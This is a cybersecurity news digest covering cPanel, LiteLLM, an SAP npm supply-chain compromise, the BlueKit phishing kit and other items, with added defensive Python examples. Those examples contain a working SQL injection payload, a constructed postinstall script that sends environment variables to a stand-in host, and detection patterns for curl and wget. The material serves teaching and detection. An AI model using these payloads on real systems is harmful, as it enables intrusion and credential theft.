Cybersecurity Newsfeed - 01/05/26
Daily cybersecurity news covering vulnerabilities, adversaries, trends, breaches, and other notable security developments.
🛡️ Vulnerabilities
cPanel & WHM Emergency Update: A critical authentication bypass vulnerability has been patched in cPanel and WHM. The flaw could allow a remote attacker to skip authentication entirely and obtain administrative access to a web hosting server without valid credentials, so exposed management interfaces should be patched immediately. More info
GitHub Patches Critical RCE: GitHub fixed a remote code execution (RCE) vulnerability that potentially granted unauthorized access to millions of private repositories. The flaw resided in the platform’s handling of certain server-side requests. More info
Windows Zero-Day Privilege Escalation: CISA has issued a binding operational directive for federal agencies to patch a Windows vulnerability (local privilege escalation) currently exploited in zero-day attacks to gain SYSTEM-level privileges. More info
LiteLLM SQL Injection (CVE-2026-42208): A critical SQL injection vulnerability was discovered in LiteLLM, an open-source proxy and gateway for calling large language model APIs. An attacker can inject their own SQL into queries the proxy builds, exposing stored provider API keys and other sensitive configuration data. More info
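The injection pattern behind this class of bug, shown as an added example that is not LiteLLM's code: a constructed SQLite table of per-user API keys is queried once with string concatenation and once with a bound parameter. The table name, column names, rows and the payload are all made up for the demonstration.

```python
# Added example (not LiteLLM's code): string-built SQL beside the parameterised form,
# run against a constructed in-memory SQLite table of API keys.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory table holding per-user API keys (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (user_id TEXT, api_key TEXT)")
    conn.executemany(
        "INSERT INTO api_keys VALUES (?, ?)",
        [("alice", "sk-alice-111"), ("bob", "sk-bob-222"), ("carol", "sk-carol-333")],
    )
    return conn


def lookup_keys_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Unsafe: the caller's string is spliced into the SQL text, so the caller controls the query."""
    query = f"SELECT api_key FROM api_keys WHERE user_id = '{user_id}'"
    return [row[0] for row in conn.execute(query)]


def lookup_keys_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterised: the driver sends user_id as a bound value, never as SQL."""
    query = "SELECT api_key FROM api_keys WHERE user_id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


# Constructed payload: closes the quoted string and appends a tautology.
INJECTION = "x' OR '1'='1"


def demo() -> dict:
    """Run both lookups with the payload and one with a normal user id."""
    conn = make_db()
    return {
        "vulnerable": lookup_keys_vulnerable(conn, INJECTION),  # every key in the table
        "safe": lookup_keys_safe(conn, INJECTION),              # no such user, empty
        "normal": lookup_keys_safe(conn, "bob"),
    }


if __name__ == "__main__":
    for name, keys in demo().items():
        print(f"{name}: {keys}")
```

The vulnerable function turns the payload into `WHERE user_id = 'x' OR '1'='1'` and dumps the whole table; the parameterised version treats the same bytes as a literal user id and returns nothing. The same rule applies to ORMs and query builders: any raw-SQL escape hatch that accepts a formatted string reintroduces the problem.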
Qinglong Task Scheduler RCE: Cybercriminals are actively exploiting RCE vulnerabilities in the Qinglong task scheduler to deploy unauthorized cryptomining software, targeting improperly secured instances exposed to the internet. More info
CISA Data Theft Alert: CISA added a significant data theft vulnerability to its Known Exploited Vulnerabilities catalog. The flaw allows unauthorized actors to bypass traditional security boundaries and exfiltrate sensitive information. More info
WordPress Plugin Dormant Backdoor: Researchers discovered a backdoor hidden within a popular WordPress redirect plugin that remained undetected for several years, allowing arbitrary command execution. More info
🎯 Adversaries
DPRK Attacks Use AI: North Korean threat actors are leveraging artificial intelligence to enhance social engineering, creating highly convincing phishing emails and fake professional profiles to target the tech and defense sectors. More info
SAP NPM Supply Chain Attack: Official SAP NPM packages, such as @sap/di.code-validation.core, were compromised to distribute malicious “postinstall” scripts designed to exfiltrate environment variables and credentials. More info
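Install-time lifecycle hooks are the mechanism this attack rides on, so the first thing to check in an affected build is which installed packages declare them. The audit below is an added example, not SAP's code or the actual compromised package contents: it walks a `node_modules` tree, lists every package with a `preinstall`, `install` or `postinstall` script, and flags scripts that read `process.env` and reach the network. The sample tree, the package names other than `@sap/di.code-validation.core`, the version string and the "malicious" script body are all constructed here for the demonstration, and the indicator patterns are assumptions rather than a complete detector.

```python
# Added example: audit a node_modules tree for install-time lifecycle scripts and flag
# the env-read-plus-network pattern described in the item. Sample tree is constructed.
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall")

# Assumed indicators of "collect secrets and send them somewhere"; tune for your stack.
SUSPICIOUS = {
    "env_read": re.compile(r"process\.env"),
    "curl_wget": re.compile(r"\b(curl|wget)\b"),
    "network": re.compile(r"(https?://|fetch\(|https?\.request|net\.connect)"),
    "base64": re.compile(r"base64", re.IGNORECASE),
}


def find_install_scripts(root: Path) -> list:
    """Return packages under root that declare install-time hooks, with indicator hits."""
    findings = []
    for pkg_json in root.rglob("package.json"):
        try:
            data = json.loads(pkg_json.read_text())
        except (ValueError, OSError):
            continue
        scripts = data.get("scripts") or {}
        hooks = {k: v for k, v in scripts.items() if k in LIFECYCLE}
        if not hooks:
            continue
        text = " ".join(hooks.values())
        # If a hook just runs a local .js file, inspect that file too.
        for m in re.finditer(r"node\s+(\S+\.js)", text):
            target = pkg_json.parent / m.group(1)
            if target.is_file():
                text += " " + target.read_text()
        hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))
        findings.append({
            "name": data.get("name", str(pkg_json.parent)),
            "version": data.get("version", "?"),
            "hooks": hooks,
            "suspicious": hits,
        })
    return sorted(findings, key=lambda f: f["name"])


def build_sample_tree() -> Path:
    """Create a constructed node_modules: one plain package, one native build, one exfiltrator."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    plain = root / "left-pad-ish"
    plain.mkdir(parents=True)
    (plain / "package.json").write_text(json.dumps(
        {"name": "left-pad-ish", "version": "1.0.0", "scripts": {"test": "jest"}}))
    native = root / "native-thing"
    native.mkdir()
    (native / "package.json").write_text(json.dumps(
        {"name": "native-thing", "version": "2.1.0",
         "scripts": {"install": "node-gyp rebuild"}}))
    bad = root / "@sap" / "di.code-validation.core"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps(
        {"name": "@sap/di.code-validation.core", "version": "0.0.0-constructed",
         "scripts": {"postinstall": "node setup.js"}}))
    # Constructed stand-in for the exfiltration script; host is a reserved .invalid name.
    (bad / "setup.js").write_text(
        "const https=require('https');"
        "const d=Buffer.from(JSON.stringify(process.env)).toString('base64');"
        "https.request({host:'example.invalid',method:'POST',path:'/'+d}).end();")
    return root


if __name__ == "__main__":
    for f in find_install_scripts(build_sample_tree()):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"{flag:10} {f['name']}@{f['version']} hooks={f['hooks']} hits={f['suspicious']}")
```

Native add-ons legitimately use `install` hooks, so the output is a review list rather than a verdict. In CI the cheaper control is to run `npm ci --ignore-scripts` (or set `ignore-scripts=true` in `.npmrc`) and run only the handful of build hooks you have explicitly vetted.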
Scattered Spider Suspect Arrested: An Estonian suspect has been arrested in connection with Scattered Spider cyberattacks. The group is known for advanced social engineering, SIM swapping, and help desk deception. More info
BlueKit Phishing Kit Bypasses MFA: The BlueKit phishing kit uses a transparent reverse proxy (an adversary-in-the-middle, or AiTM, setup) that relays the victim's login to the real site and captures credentials and the resulting session cookie in real time. Because the victim completes the MFA challenge themselves, the attacker ends up with an already-authenticated session and code-based or push-based MFA is effectively bypassed. More info
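The footprint this leaves in identity logs is a session that is minted from one source (the proxy) and then used from another (the operator) shortly afterwards. The detection below is an added example, not BlueKit's code or any vendor's rule: it runs over a few constructed sign-in and session-use events and raises an alert when a session cookie is used from a new IP within a short window of the MFA success, with a secondary signal when the MFA itself completed from a hosting-provider ASN. The log field names, the ASN list and the window are assumptions to adapt to your own identity provider's schema.

```python
# Added example: AiTM session-replay heuristic over constructed identity-provider events.
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed: ASNs of cloud/VPS providers where phishing proxies are commonly staged.
HOSTING_ASNS = {"AS16509", "AS14061", "AS24940"}
WINDOW = timedelta(minutes=30)  # how soon after MFA a cookie from a new IP is suspicious

# Constructed sample events (JSON lines). S1 is the AiTM case, S2 is normal,
# S3 roams to a new IP hours later, which this rule deliberately does not flag.
SAMPLE_LOG = """\
{"ts":"2026-01-05T08:00:00Z","event":"mfa_success","user":"jdoe","session":"S1","ip":"203.0.113.10","asn":"AS14061"}
{"ts":"2026-01-05T08:02:00Z","event":"session_use","user":"jdoe","session":"S1","ip":"198.51.100.7","asn":"AS64501"}
{"ts":"2026-01-05T09:00:00Z","event":"mfa_success","user":"asmith","session":"S2","ip":"192.0.2.20","asn":"AS64502"}
{"ts":"2026-01-05T09:05:00Z","event":"session_use","user":"asmith","session":"S2","ip":"192.0.2.20","asn":"AS64502"}
{"ts":"2026-01-05T10:00:00Z","event":"mfa_success","user":"bkim","session":"S3","ip":"192.0.2.30","asn":"AS64503"}
{"ts":"2026-01-05T18:00:00Z","event":"session_use","user":"bkim","session":"S3","ip":"192.0.2.31","asn":"AS64503"}
"""


def parse(log: str) -> list:
    """Parse JSON lines into dicts with real timestamps, oldest first."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["ts"] = datetime.fromisoformat(e["ts"].replace("Z", "+00:00"))
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def detect_aitm(events: list) -> list:
    """Flag sessions whose cookie is used from a new IP soon after MFA, or minted from a hosting ASN."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)
    alerts = []
    for sid, evs in by_session.items():
        origin = next((e for e in evs if e["event"] == "mfa_success"), None)
        if origin is None:
            continue
        reasons = []
        if origin["asn"] in HOSTING_ASNS:
            reasons.append("mfa_from_hosting_asn")
        for e in evs:
            if e["event"] != "session_use":
                continue
            if e["ip"] != origin["ip"] and e["ts"] - origin["ts"] <= WINDOW:
                reasons.append("session_replay_from_new_ip")
                break
        if reasons:
            alerts.append({"user": origin["user"], "session": sid, "reasons": reasons})
    return sorted(alerts, key=lambda a: a["session"])


if __name__ == "__main__":
    for a in detect_aitm(parse(SAMPLE_LOG)):
        print(f"ALERT user={a['user']} session={a['session']} reasons={a['reasons']}")
```

Detection after the fact is the fallback; the control that actually closes this gap is phishing-resistant MFA (FIDO2/WebAuthn passkeys), because the authenticator signs over the origin it sees and a proxy on a lookalike domain cannot produce a valid assertion for the real site.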
Kuse Web App Abused for Phishing: Threat actors are abusing the legitimate infrastructure of the Kuse web application to host malicious phishing documents, bypassing traditional email filters and security gateways. More info
📈 Trends
Shadow AI and OAuth Sprawl: The Vercel breach serves as a warning about unsanctioned AI tools and the accumulation of broad OAuth grants to third-party integrations. Once one such integration is compromised, its standing permissions let an attacker move laterally into other connected cloud services without touching a password or MFA prompt. More info
Novel Deepfake Detection: Brinker has introduced a new approach to deepfake detection that analyzes subtle physiological inconsistencies that AI models currently struggle to replicate perfectly. More info
Ransomware Data Exfiltration Bypass: A critical flaw has been identified that allows ransomware operators to bypass security controls and exfiltrate data from encrypted volumes with minimal detection. More info
AI Agent Database Wipe: A Cursor AI agent misinterpreted commands during routine maintenance, resulting in the accidental deletion of the entire PocketOS database and its backups. More info
💥 Breaches & Leaks
Roblox Account Hijacking Ring: Authorities arrested hackers responsible for hijacking and selling over 610,000 Roblox accounts via phishing and credential stuffing. More info
50 Million Euro Crypto Fraud Dismantled: European law enforcement agencies dismantled a massive cryptocurrency investment fraud ring that lured victims into high-yield schemes via fabricated websites. More info
Polymarket Rejects Breach Claims: Polymarket has officially rejected claims of a data breach after a hacker posted records allegedly stolen from the platform, stating no evidence of core system compromise was found. More info
📚 Others
Microsoft Teams Service Disruption: A backend configuration change inadvertently disrupted Microsoft Teams chat and calling services globally, highlighting the fragility of centralized cloud services. More info
